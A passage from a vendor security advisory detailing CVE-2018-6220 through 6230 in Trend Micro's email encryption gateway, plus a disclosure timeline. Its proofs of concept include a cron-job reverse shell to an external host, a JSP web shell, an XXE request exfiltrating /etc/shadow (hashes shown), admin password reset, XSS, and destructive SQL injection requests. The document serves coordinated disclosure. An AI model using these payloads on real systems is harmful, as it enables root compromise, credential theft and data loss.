certificate\nvalidation or public key pinning, which makes it easier for an attacker\nto eavesdrop and tamper the data. \n\n7.2. *Arbitrary file write leading to command execution*\n\n[CVE-2018-6220]\nThe following code snippet is responsible for downloading the update\nfile (com/identum/pmg/web/CheckForUpdates.java):\n \n/-----\nFileDownload fd = new FileDownload();\nif (!fd.download(updateURLRoot + \"/\" + rpmFileName, \"/tmp/\" +\nrpmFileName)) {\n return 10;\n}\n[...]\n-----/\n\nThe rpmFileName variable is controlled by the attacker, as it is taken\nfrom the aforementioned update file. As a consequence, the attacker\ncontrols the path where the update file is going to be downloaded. The\nRPM file is written by the root user with 0644 permissions. Being able\nto write to the file system as root opens the door to several code\nexecution vectors on Linux machines. \n\nIn this PoC we present one vector which consist on creating a cron job\non /etc/cron.d directory. \n \nThe attacker can send the following response to [Request #1]:\n\n/-----\nHTTP/1.1 200 OK\nContent-Type: text/html\nServer: Microsoft-IIS/7.5\nX-Powered-By: ASP.NET\nDate: Tue, 23 May 2017 14:39:46 GMT\nConnection: close\nContent-Length: 26\n\n5.7\n../../../../../../../etc/cron.d/test\ntest.html\n-----/\n\nAs a result, the server will create the file /etc/cron.d/test. Its\ncontents are also controlled by the attacker. When the update launches,\nthe appliance will download it from the following URL:\n\n/-----\nhttp://downloads.privatepost.com/files/TMEEG/updates/../../../../../../../etc/cron.d/test\n-----/\n\nThe attacker can tamper the server\u0027s response and inject arbitrary data,\nsuch as a reverse shell payload:\n \n/-----\n* * * * * root /bin/bash -i \u003e\u0026 /dev/tcp/external_server/1080 0\u003e\u00261\n-----/\n\ngaining code execution upon exploitation:\n\n/-----\n$ sudo nc -lvvp 1080\nListening on [0.0.0.0] (family 0, port 1080)\nConnection from [server] port 1080 [tcp/socks] accepted (family 2, sport\n52171)\nbash: no job control in this shell\n[root@ localhost ~]# id\nuid=0(root) gid=0(root)\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\ncontext=user_u:system_r:unconfined_t\n-----/\n\n7.3. *Unvalidated software updates*\n\n[CVE-2018-6221]\nThe update mechanism described in 7.2 does not validate the RPM file\ndownloaded. \n\nAn attacker in a man-in-the-middle position could tamper with the RPM\nfile and inject its own. \n\nThe following code snippet is responsible for installing the unvalidated\nRPM (com/identum/pmg/web/CheckForUpdates.java):\n\n/-----\ntry\n {\n System.out.println(\"running file:\");\n System.out.println(\"rpm --upgrade --nodeps /tmp/\" + rpmFileName);\n\n Process process = Runtime.getRuntime().exec(\"rpm --upgrade\n--nodeps /tmp/\" + rpmFileName);\n [..]\n {\n-----/\n\nIn the following Proof of Concept, we crafted a malicious RPM file that\nexecutes a reverse shell once opened. This can be achieved by adding a\nreverse shell script to %pre section of RPM\u0027s SPEC file, which is\nexecuted previous to any installation step. As can be seen, this results\nin code execution as root:\n\n/-----\n$ sudo nc -lvvp 1080\nListening on [0.0.0.0] (family 0, port 1080)\nConnection from [server] port 1080 [tcp/socks] accepted (family 2, sport\n40445)\nbash: no job control in this shell\n[root@ localhost /]# id\nuid=0(root) gid=0(root)\ngroups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\ncontext=root:system_r:rpm_script_t:SystemLow-SystemHigh\n-----/\n\n7.4. *Arbitrary logs location leading to command execution*\n\n[CVE-2018-6222]\nThe location of the log files can be changed in the logConfiguration.do\npage. MimeBuildServer logs are particularly interesting because its\ncontents can be controlled by an attacker. \n\nThe first step is to point the log file to the Web application root. The\nfollowing request redirects MimeBuildServer logs to\n/opt/tomcat/webapps/ROOT/pepito.jsp and enables full debug logs:\n\n/-----\nPOST /logConfiguration.jsp HTTP/1.1\nHost: [server]\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: https://[server]/logConfiguration.do\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 798\nCookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nclient0=KeyManager\u0026warnLevel0=3\u0026infoLevel0=1\u0026debugLevel0=0\u0026path0=%2Fvar%2Flog%2Fppg%2Fkeymanserver.log\u0026client1=LauncherServer\u0026warnLevel1=3\u0026infoLevel1=1\u0026debugLevel1=0\u0026path1=%2Fvar%2Flog%2Fppg%2Flauncher.log\u0026client2=KeyManagerClient\u0026warnLevel2=3\u0026infoLevel2=1\u0026debugLevel2=0\u0026path2=%2Fvar%2Flog%2Fppg%2Fkeymanclient.log\u0026client3=MTAInterface\u0026warnLevel3=3\u0026infoLevel3=1\u0026debugLevel3=0\u0026path3=%2Fvar%2Flog%2Fppg%2Fmtainterface.log\u0026client4=PolicyManagerServer\u0026warnLevel4=3\u0026infoLevel4=1\u0026debugLevel4=0\u0026path4=%2Fvar%2Flog%2Fppg%2Fpolicymanager.log\u0026client5=SupervisorServer\u0026warnLevel5=0\u0026infoLevel5=3\u0026debugLevel5=0\u0026path5=%2Fvar%2Flog%2Fppg%2FSupervisorServer.log\u0026client6=MimeBuilderServer\u0026warnLevel6=3\u0026infoLevel6=3\u0026debugLevel6=3\u0026path6=%2Fopt%2Ftomcat%2Fwebapps%2FROOT%2Fpepito.jsp\u0026action=logConfiguration%3Apostback\n-----/\n\nThe second step is to update the MimeBuilder configuration and insert\narbitrary JSP code. One candidate is the \"Encrypted meeting request\nemail message\" form. \n\n/-----\nPOST /mimebuilderconfig.jsp HTTP/1.1\nHost: [server]\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: https://[server]/MimeBuilderConfig.do\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 2915\nCookie: JSESSIONID=9363824A3BA637A8CC5B51955625075B\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\naddEncryptionXHeader=on\u0026encryptionXHeader=X-TMEEG-ENCRYPTED\u0026addDecryptionXHeader=on\u0026decryptionXHeader=X-TMEEG-DECRYPTED\u0026addDecryptionNotice=off\u0026decryptionNotice=javascript%3A%2F*%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%2B%2F%22%2F%2B%2Fonmouseover%3D1%2F%2B%2F%5B*%2F%5B%5D%2F%2B%28%28new%28Image%29%29.src%3D%28%5B%5D%2B%2F%5C%2Ffud3uvq5miuqpikdqya3wzicu30woofc7z2nr%5C.burpcollaborator.net%2F%29.replace%28%2F%5C%5C%2Fg%2C%5B%5D%29%29%2F%2F%27%3E\u0026errorOnVerificationFailure=off\u0026meetingRequestEmailText=%3C%25%40+page+import%3D%22java.util.*%2Cjava.io.*%22%25%3E%0D%0A%3C%25%0D%0A%2F%2F%0D%0A%2F%2F+JSP_KIT%0D%0A%2F%2F%0D%0A%2F%2F+cmd.jsp+%3D+Command+Execution+%28unix%29%0D%0A%2F%2F%0D%0A%2F%2F+by%3A+Unknown%0D%0A%2F%2F+modified%3A+27%2F06%2F2003%0D%0A%2F%2F%0D%0A%25%3E%0D%0A%3CHTML%3E%3CBODY%3E%0D%0A%3CFORM+METHOD%3D%22GET%22+NAME%3D%22myform%22+ACTION%3D%22%22%3E%0D%0A%3CINPUT+TYPE%3D%22text%22+NAME%3D%22cmd%22%3E%0D%0A%3CINPUT+TYPE%3D%22submit%22+VALUE%3D%22Send%22%3E%0D%0A%3C%2FFORM%3E%0D%0A%3Cpre%3E%0D%0A%3C%25%0D%0Aif+%28request.getParameter%28%22cmd%22%29+%21%3D+null%29+%7B%0D%0A++++++++out.println%28%22Command%3A+%22+%2B+request.getParameter%28%22cmd%22%29+%2B+%22%3CBR%3E%22%29%3B%0D%0A++++++++Process+p+%3D+Runtime.getRuntime%28%29.exec%28request.getParameter%28%22cmd%22%29%29%3B%0D%0A++++++++OutputStream+os+%3D+p.getOutputStream%28%29%3B%0D%0A++++++++InputStream+in+%3D+p.getInputStream%28%29%3B%0D%0A++++++++DataInputStream+dis+%3D+new+DataInputStream%28in%29%3B%0D%0A++++++++String+disr+%3D+dis.readLine%28%29%3B%0D%0A++++++++while+%28+disr+%21%3D+null+%29+%7B%0D%0A++++++++++++++++out.println%28disr%29%3B+%0D%0A++++++++++++++++disr+%3D+dis.readLine%28%29%3B+%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%25%3E%0D%0A%3C%2Fpre%3E%0D%0A%3C%2FBODY%3E%3C%2FHTML%3E%0D%0A%0D%0A\u0026encryptionVersion=zd\u0026replyToSender=on\u0026replyToAll=on\u0026replyForward=on\u0026zdMainTemplate=EncryptedMessageTemplate.html\u0026zdAttachmentTemplate=EncryptedAttachmentTemplate.html\u0026zdAttachmentPayloadTemplate=EncryptedAttachmentPayloadTemplate.html\u0026preProcessMaxBlockSize=1914\u0026preProcessMainDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A\u0026preProcessInlineDelimeter=%22%5C%3E%0D%0A%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22%0D%0A\u0026b64EncodeAttachments=off\u0026replyToSenderZdv4=on\u0026replyToAllZdv4=on\u0026replyForwardZdv4=on\u0026zdMainTemplateZdv4=V4EncryptedMessageTemplate.htmlbt0ly\u0026preProcessMaxBlockSizeZdv4=1914\u0026preProcessMainDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeMessage%22+id%3D%22ibeMessagePart__%5BAUTONUM%5D__%22+value%3D%22\u0026preProcessInlineDelimeterZdv4=%22%3E+%3Cinput+type%3D%22hidden%22+name%3D%22ibeInline%22+id%3D%22ibeInlinePart__%5BAUTONUM%5D__%22+value%3D%22\u0026b64EncodeAttachmentsZdv4=off\u0026maxProcessThreads=10\u0026mimeBuilderAction=mimeconfig%3Apostback\n-----/\n\nThe next time the service components are restarted, the log file will be\ncreated with the desired JSP code. \n\nWith the sample JSP code from the previous request, the attacker would\nthen navigate to pepito.jsp and execute arbitrary commands as root:\n\n/-----\nhttps://[server]/pepito.jsp?cmd=id\n\nCommand: id\n\nuid=0(root) gid=0(root) context=system_u:system_r:java_t\n-----/\n\n7.5. *Missing authentication for appliance registration*\n\n[CVE-2018-6223]\nThe registration endpoint is provided for system administrators to\nconfigure the virtual appliance upon deployment. However, this endpoint\nremains accessible without authentication even after the appliance is\nconfigured, which would allow attackers to set configuration parameters\nsuch as the administrator username and password. \n \nThe following request changes the administrator password to \"sombrero\":\n\n/-----\nPOST /register.jsp HTTP/1.1\nHost: [server]\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 414\n\naction=register%3Apostback\u0026activationCode1=EE\u0026activationCode2=XXXX\u0026activationCode3=XXXX\u0026activationCode4=XXXX\u0026activationCode5=XXXX\u0026activationCode6=XXXX\u0026activationCode7=XXXX\u0026resellerCode=\u0026hostName=tester.localdomain\u0026regEmail=pentester1@coresecurity.com\u0026contactName=Test+Test\u0026contactEmail=pentester1@coresecurity.com\u0026contactPhone=%2B5491145712447\u0026userName=administrator\u0026password=sombrero\u0026confirmPassword=sombrero\n-----/\n\nNote that a valid activation code is required. This code can be easily\nobtained by requesting a trial from Trend Micro\u0027s website. \n\n7.6. \n\nThis vulnerability can be chained with 7.4 and lead to remote command\nexecution. It could also be abused to force updates once the attacker is\nin a man-in-the-middle position to exploit 7.2 or 7.3, which would also\nlead to remote command execution. \n\nThe following proof of concept starts the check for updates process. \n\n/-----\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"https://[server]/checkForUpdates.do\"\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n-----/\n\n7.7. *XML external entity injection in configuration.jsp*\n\n[CVE-2018-6225]\nThe pciExceptionXml parameter of the configuration.jsp script is\nvulnerable to XML external entity injection. \n\nThe following proof of concept uses external entities to send the\n/etc/shadow file to an external server. \n\n/-----\nPOST /configuration.jsp HTTP/1.1\nHost: [server]\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 938\nCookie: JSESSIONID=E8357364AE748ACB904BE6E34F47F2DB\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n \nincomingPort=25\u0026externalHost=\u0026outboundExternalPort=25\u0026internalHost=\u0026outboundInternalPort=25\u0026pciUseSemantics=on\u0026pciScanAttachments=on\u0026pciExceptionbetween0=on\u0026pciExceptionbetween1=on\u0026pciExceptionText0=on\u0026enabledInput=on\u0026exceptionInput=\u0026enabledInput=on\u0026editExceptionInput=\u0026enabledInput=on\u0026startInput=\u0026endInput=\u0026enabledInput=on\u0026startInput=\u0026endInput=\u0026action=configuration%3Apostback\u0026pciExceptionXml=\u003c%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f\u003e\n\u003c!DOCTYPE+roottag+[\n+\u003cENTITY+%25+file+SYSTEM+\"file%3a///etc/shadow\"\u003e\n+\u003c!ENTITY+%25+dtd+SYSTEM+\"http%3a//external_server/combine.dtd\"\u003e\n%25dtd%3b]\u003e\n\u003cci_exceptions\u003e\u003cpci_exception+enabled%3d\"true\"\u003e\u003ctart\u003e\u003c[CDATA[\u003chead\u003e]]\u003e%26send%3b\u003c/start\u003e\u003cend\u003e\u003c/head\u003e]]\u0026gt;\u0026lt;/end\u003e\u0026lt;/pci_exception\u003e\u0026lt;pci_exception+enabled%3d\"true\"\u003e\u0026lt;start\u003e\u003c![CDATA[\u003cstyle\u003e\u003c/start\u003e\u003cend\u003e\u003c/style\u003e\u003c/end\u003e\u003c/pci_exception\u003e\u003cpci_exception+enabled%3d\"true\"\u003e\u003cstart\u003e\u003chead/\u003e\u003c/start\u003e\u003c/pci_exception\u003e\u003c/pci_exceptions\u003e\n-----/\n\nThe combine.dtd file is hosted on an external server, and its contents\nare:\n\n/-----\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003c!ENTITY % all \"\u003c!ENTITY send SYSTEM\n\u0027gopher://external_server:1080/?%file;\u0027\u003e\"\u003e\n%all;\n\n$ sudo nc -lvvp 1080\nListening on [0.0.0.0] (family 0, port 1080)\nConnection from [server] port 1080 [tcp/socks] accepted (family 2, sport\n49676)\nroot:$1$8PtHrAEM$DmIkWpxYSOzhM0KLJGZvY/:14090:0:99999:7:::\nbin:*:14089:0:99999:7:::\ndaemon:*:14089:0:99999:7:::\nadm:*:14089:0:99999:7:::\nlp:*:14089:0:99999:7:::\nsync:*:14089:0:99999:7:::\nshutdown:*:14089:0:99999:7:::\nhalt:*:14089:0:99999:7:::\nmail:*:14089:0:99999:7:::\nnews:*:14089:0:99999:7:::\nuucp:*:14089:0:99999:7:::\noperator:*:14089:0:99999:7:::\ngames:*:14089:0:99999:7:::\ngopher:*:14089:0:99999:7:::\nftp:*:14089:0:99999:7:::\nnobody:*:14089:0:99999:7:::\nrpm:!!:14089:0:99999:7:::\ndbus:!!:14089:0:99999:7:::\nexim:!!:14089:0:99999:7:::\nnscd:!!:14089:0:99999:7:::\nvcsa:!!:14089:0:99999:7:::\nrpc:!!:14089:0:99999:7:::\nsshd:!!:14089:0:99999:7:::\npcap:!!:14089:0:99999:7:::\nhaldaemon:!!:14089:0:99999:7:::\npostgres:!!:14090::::::\ntomcat:!!:14090:0:99999:7:::\nxfs:!!:14179::::::\npostfix:!!:14194::::::\n-----/\n\nThese actions require the user to be authenticated within the Web\nconsole, so an attacker would need to obtain valid credentials first. \nPossible vectors to achieve this include exploiting any of the XSS\nissues described in 7.8, 7.9 and 7.10, or leveraging the XSRF\nvulnerability described in 7.6. \n\n7.8. *Reflected cross-site scripting in keymanserverconfig.jsp*\n\n[CVE-2018-6226]\nThe deniedKeysExpireTimeout and keyAge parameters of the\nkeymanserverconfig.jsp script are vulnerable to cross-site scripting. \n\nThe following is a proof of concept to demonstrate the vulnerability:\n\n/-----\nhttps://[server]/keymanserverconfig.jsp?keyAge=3\u0026keyAgeUnits=m\u0026deniedKeysExpireTimeout=6000yta9q%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekb4w2xa9v0d\u0026keymanServerAction=kmsconfig%3Apostback\n-----/\n\n7.9. *Reflected cross-site scripting in mimebuilderconfig.jsp*\n\n[CVE-2018-6226]\nThe following parameters of the mimebuilderconfig.jsp script are\nvulnerable to cross-site scripting: decryptionXHeader, encryptionXHeader,\nmeetingRequestEmailText, zdAttachmentPayloadTemplate, zdAttachmentTemplate,\nzdMainTemplate, zdMainTemplateZdv4. \n\nThe following is a proof of concept to demonstrate the vulnerability:\n\n/-----\nhttps://[server]/mimebuilderconfig.jsp?zdMainTemplateZdv4=%22%3E%3Cscript%3Ealert(1)%3C/script%3E\n-----/\n\n7.10. *Stored cross-site scripting in editPolicy.jsp*\n\n[CVE-2018-6227]\nThe hidEmails parameter of the editPolicy.jsp script is vulnerable to\ncross-site scripting. \n\nThe following request adds a policy for the email address\n\"\u003cscript\u003ealert(1)\u003c/script\u003e\":\n\n/-----\nPOST /editPolicy.jsp HTTP/1.1\nHost: [server]\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: https://[server]/policies.jsp\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 136\nCookie: JSESSIONID=7D25474429E52C823C63357255A5E781\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n\naction=editPolicy%3Apostback\u0026hidEmails=\u003cscript\u003ealert(1)\u003c/script\u003e\u0026hidConditions=\u0026hidRuleId=1\u0026hidDelete=\u0026ruleResult=3\u0026ruleTarget=3\u0026envId=1\n-----/\n\nThe input will be stored unescaped and rendered every time the policies.do\nscript is executed. \n\nExcerpt of the policies.do source showing the injected script tag:\n\n/-----\n\u003ctr\u003e\n\u003ctd ondblclick=\"edit_policy(this);\" style=\"border:solid 1px\n#AAAAAA;background-color:#F5F5F5;cursor:move;\"\n onmousedown=\"mouse_down(this, event);\" onmouseup=\"mouse_up(this);\"\nonmouseout=\"mouse_out(this);\"\n onmousemove=\"mouse_move(this, event);\"\u003eDon\u0027t decrypt messages to\n\u003cscript\u003ealert(1)\u003c/script\u003e\n-----/\n\n7.11. *SQL injection in policies.jsp*\n\n[CVE-2018-6228]\nThe hidEditId parameter of the policies.jsp script is not sanitized,\nleading to SQL injection. \n\nAs can be seen in the following excerpt, the script reads a parameter\nnamed hidEditId and forwards it to the editPolicy.jsp script if it is\nnot set to -1. \n\nFrom webapps/ROOT/policies.jsp:\n\n/-----\n\u003c% if (request.getParameter(\"hidEditId\") != null)\n if (request.getParameter(\"hidEditId\").compareTo(\"-1\") != 0)\n {\n String hid_edit_id = request.getParameter(\"hidEditId\");\n %\u003e\u003cjsp:forward page=\"editPolicy.jsp\"\u003e\u003cjsp:param name=\"editRuleId\"\nvalue=\"\u003c%= hid_edit_id %\u003e\"/\u003e\u003c/jsp:forward\u003e\u003c%\n }\n[...]\n-----/\n\nThe editPolicy.jsp script will pass this parameter without any\nmodification to the loadRuleDetails method, which is defined in the\nformEditPolicy class\n\nFrom webapps/ROOT/editPolicy.jsp:\n \n/-----\nif (request.getParameter(\"editRuleId\") != null)\nfrm.loadRuleDetails(request.getParameter(\"editRuleId\"));\n[...]\n-----/\n\nFinally, the loadRuleDetails method will use the unsanitized parameter\nit receives to build a dynamic SQL statement as follows:\n\nFrom webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy:\n\n/-----\npublic boolean loadRuleDetails(String ruleId)\n{\n _databaseError = false;\n\n\n try\n {\n _ruleId = ruleId;\n _ruleResultId = dataStore.getRuleResultId(ruleId);\n _ruleForId = dataStore.getRuleForId(ruleId);\n _ruleEmails = dataStore.getRuleAddreses(ruleId);\n _ruleSubRules = dataStore.getSubRules(ruleId);\n [...]\n\npublic String getRuleResultId(String ruleId) throws SQLException\n{\n Connection cnn = MySQLClient.GetInstance().GetConnection();\n Statement query = cnn.createStatement();\n String ruleResultId = \"\";\n\n ResultSet rs = null;\n\n try\n {\n rs = query.executeQuery(\"SELECT RuleResultId FROM RulesEngine\nWHERE Id = \" + ruleId);\n [...]\n-----/\n\nThe contents of ruleId will be appended to the SELECT query, resulting\nin a SQL injection. \n\nThe following PoC opens a policy to edit, even though the hidEditId\nparameter is invalid. Due to the \"always true\" comparison, the first\nelement is retrieved:\n\n/-----\nPOST /policies.jsp HTTP/1.1\nHost: server\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 84\nReferer: https://server/editPolicy.jsp\nCookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2\nConnection: close\nUpgrade-Insecure-Requests: 1\n\naction=policies%3Apostback\u0026hidSequence=\u0026hidEditId=178275005%20or%201%3d1%20LIMIT%201\n-----/\n\n7.12. *SQL injection in editPolicy.jsp*\n\n[CVE-2018-6229]\nThe hidRuleId parameter of the editPolicy.jsp script is not sanitized,\nleading to SQL injection in a DELETE statement. \n\nThe following excerpt shows that the request object is forwarded to the\nDeletePolicy method implemented in the formEditPolicy class. \n\nFrom webapps/ROOT/editPolicy.jsp:\n\n/-----\n\u003c% if (frm.isPostBack())\n{\n if (request.getParameter(\"hidDelete\").compareTo(\"YES\") == 0)\n {\n frm.DeletePolicy(request);\n }\n[...]\n-----/\n\nDeletePolicy reads the hidRuleId parameter and calls deletePolicy with\nit, without doing any sanitization. \n\nFrom webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/formEditPolicy:\n\n/-----\npublic boolean DeletePolicy(HttpServletRequest request)\n{\n String ruleId = request.getParameter(\"hidRuleId\");\n boolean success = dataStore.deletePolicy(ruleId);\n _databaseError = (!success);\n\n return success;\n}\n-----/\n\nFinally, the JPostgresDataHelper class uses the ruleId parameter to\nbuild dynamic SQL statements, as can be seen in the following extract. \n \nFrom webapps/ROOT/WEB-INF/classes/com/identum/pmg/data/JPostgresDataHelper:\n\n/-----\npublic boolean deletePolicy(String ruleId)\n{\n Connection cnn = null;\n Statement query = null;\n\n boolean bSuccess = true;\n\n try\n {\n cnn = MySQLClient.GetInstance().GetConnection();\n cnn.setAutoCommit(false);\n query = cnn.createStatement();\n\n query.executeUpdate(\"DELETE FROM RulesEmailIndex WHERE\nRulesEngineId = \" + ruleId);\n query.executeUpdate(\"DELETE FROM SubRuleIndex WHERE RulesEngineId\n= \" + ruleId);\n query.executeUpdate(\"DELETE FROM RulesEngine WHERE Id = \" + ruleId);\n [...]\n-----/\n\nThe ruleId parameter will be appended as-is to the DELETE statements,\nresulting in a SQL injection. \n\nThe following request will cause the RulesEmailIndex, SubRuleIndex, and\nRulesEngine tables to be truncated:\n\n/-----\nPOST /editPolicy.jsp HTTP/1.1\nHost: [server]\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: https://[server]/policies.jsp\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 133\nCookie: JSESSIONID=2B363A12C93CA038322EE551890FF30F\nConnection: close\nUpgrade-Insecure-Requests: 1\n\naction=editPolicy%3Apostback\u0026hidEmails=\u0026hidConditions=\u0026hidRuleId=223+OR++\u00271+\u0027%3d+\u00271+\u0027\u0026hidDelete=YES\u0026ruleResult=3\u0026ruleTarget=3\u0026envId=1\n-----/\n\n\n7.13. *SQL Injection in emailSearch.jsp*\n\n[CVE-2018-6230]\nThe SearchString parameter of the emailSearch.jsp script is not\nsanitized, leading to a SQL injection. \n\nAs can be seen in the following excerpt, the emailSearch.jsp script\nreads a parameter named SearchString and calls the getResults method\ndefined in the wsEmailSearch class. \n\nFrom webapps/ROOT/emailSearch.jsp:\n\n/-----\nif (session.getAttribute(\"UserName\") != null)\n{\n response.setContentType(\"text/xml\");\n ws.setSearchParam(request.getParameter(\"SearchString\"));\n java.util.Vector res = ws.getResults();\n [...]\n-----/\n\nThe searchParam property is not sanitized before being used to build a\ndynamic SQL query, resulting in a SQL injection in the SELECT statement. \n \nFrom webapps/ROOT/WEB-INF/classes/com/identum/pmg/web/wsEmailSearch:\n\n/-----\npublic class wsEmailSearch\n{\n private String _searchParam = \"\";\n public void setSearchParam(String searchParam) { _searchParam =\nsearchParam; }\n\n public Vector getResults()\n {\n Vector res = new Vector();\n\n Connection cnn = MySQLClient.GetInstance().GetConnection();\n try\n {\n Statement query = cnn.createStatement();\n\n ResultSet rs = query.executeQuery(\"SELECT address FROM\nRulesEmailAddresses WHERE address LIKE \u0027%\" + _searchParam + \"%\u0027 ORDER BY\naddress\");\n[...]\n-----/\n\nThe following proof of concept will cause all the e-mails on the\ndatabase to be retrieved:\n\n/-----\nPOST /emailSearch.jsp HTTP/1.1\nHost: server\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0)\nGecko/20100101 Firefox/53.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded\nReferer: https://server/policies.jsp\nContent-Length: 39\nCookie: JSESSIONID=4CFE9B6E37DFABC16AF5D6F091F1A0E2\nConnection: close\n\nSearchString=\u0027 OR \u0027%1%\u0027=\u0027%1\n-----/\n\n8. *Report Timeline*\n2017-06-05: Core Security sent an initial notification to Trend Micro,\nincluding a draft advisory. \n2017-06-05: Trend Micro confirmed reception of advisory and informed\nthey will submit it to the relevant technical team for validation and\nreplication. \n2017-06-22: Core Security asked for an update on the vulnerability\nreported. \n2017-06-22: Trend Micro answered saying the cases are still being vetted\nand that they will commit a time when the solution is finalized. \n2017-08-28: Core Security asked again for an update on the vulnerability\nreported. \n2017-08-28: Trend Micro answered saying the team is still in the process\nof creating the official fix for the vulnerabilities, although there is\nstill no official release date. \n2017-10-02: Core Security asked again for an update on the vulnerability\nreported. \n2017-10-02: Trend Micro answered saying the team are still finalizing\nthe fix to ensure all vulnerabilities are covered. \n2017-11-13: Core Security asked again (4th time) for an ETA for the\nofficial fix. We stated we need a release date or a thorough explanation\non why after five months there is still no date defined. If there is no\nsuch answer we will be forced to publish the advisory. \n2017-11-14: Trend Micro answered saying the team is still working on two\nvulnerabilities and due to the complexity and number of vulnerabilities\noverall found, their team requires more time. \n2018-01-16: Core Security asked again (5th time) for an ETA for the\nofficial fix. \n2018-01-23: Trend Micro answered proposing the publication date to be\nFebruary 7th. \n2018-01-24: Core Security thanked Trend Micro\u0027s answer and asked if all\nthe vulnerabilities reported in the advisory will be addressed. In\naddition, Core Security asked for CVE-IDs. \n2018-01-24: Trend Micro confirmed all submitted vulnerabilities will be\naddressed and notified Core Security they will send the CVE-IDs when\nhave these assigned. In addition, Trend Micro sent its new PGP key. \n2018-01-29: Core Security thanked Trend Micro\u0027s confirmation and agreed\non the proposed release date. \n2018-01-29: Trend Micro answered saying the team found a couple of\nissues during the QA test. Consequently, Trend Micro asked for\nadditional time to fix the remaining vulnerabilities and required a\nseparated disclosure time. \n2018-01-29: Core Security answered its intention to report all the\nvulnerabilities in just one advisory and asked for a timeline for the fix. \n2018-02-01: Core Security asked for an update on the remaining\nvulnerabilities. \n2018-02-02: Trend Micro sent an update and requested a week extension. \n2018-02-02: Core Security thanked Trend Micro\u0027s update and agreed to\npostpone the release. \n2018-02-14: Trend Micro answered saying the remaining vulnerabilities\nwill not be addressed in the patch due to its complexity; therefore,\nmitigation steeps will be recommending. Also, Trend Micro proposed\nFebruary 21 as the release date. \n2018-02-14: Core Security thanked Trend Micro\u0027s update and agreed on the\nproposed release date. \n2018-02-21: Advisory CORE-2017-0006 published. \n\n9. *References*\n\n[1]\nhttp://apac.trendmicro.com/apac/enterprise/network-web-messaging-security/email-encryption/\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and context\nneeded to manage security risks across the enterprise. This shared\ninsight gives customers a comprehensive view of their security posture\nto make better security remediation decisions. Better insight allows\norganizations to prioritize their efforts to protect critical assets,\ntake action sooner to mitigate access risk, and react faster if a breach\ndoes occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 